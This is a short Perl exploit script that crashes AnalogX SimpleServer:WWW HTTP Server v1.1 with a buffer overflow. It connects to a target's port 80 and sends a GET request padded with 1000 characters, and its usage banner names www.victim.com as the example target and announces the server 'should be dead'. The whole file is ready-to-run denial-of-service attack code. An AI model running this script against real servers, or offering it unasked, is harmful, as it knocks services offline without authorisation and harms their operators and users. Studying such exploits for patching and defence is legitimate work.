#!/usr/bin/perl
#
# Buffer Overflow exploit for AnalogX SimpleServer:WWW HTTP Server AnalogX.pl
#!/usr/bin/perl
#
# Buffer Overflow exploit for AnalogX SimpleServer:WWW HTTP Server v1.1
# ---------------------------------------------------------------------
#
# Exploit Coded By : Neon-Lenz (
#
# Website: http://TheGovernment.Com/Cyrax
#
# Usage: ./AnalogX.pl <host>
#
# Example: ./AnalogX.pl www.victim.com
#
# Greets To: Acid Blades, ThePike, Trib, Kn00p, KeyDet, DarkHunter and
# everyone else i forgot to mention !
use IO::Socket;
$host=$ARGV[0];
$port=80;
print <<"EOT";
AnalogX SimpleServer:WWW HTTP Server v1.1 Buffer Overflow By Neon-Lenz
----------------------------------------------------------------------
Usage: ./AnalogX.pl <host> (assign a webserver, or it won't work)
Example: ./AnalogX.pl www.victim.com
EOT
$sock = IO::Socket::INET->new(PeerAddr => $host, # Connects to the host
PeerPort => $port,
Proto => 'tcp');
$z=Z;
$send = $z x 1000; # Overflows the host
print "GET 1000 chars on remote webserver.\n";
print $sock "GET /$send\n";
sleep(3);
print "Done. AnalogX server should be dead.\n";
close($sock) # Hmm closes the stuff, duh!
#EOC - End Of Code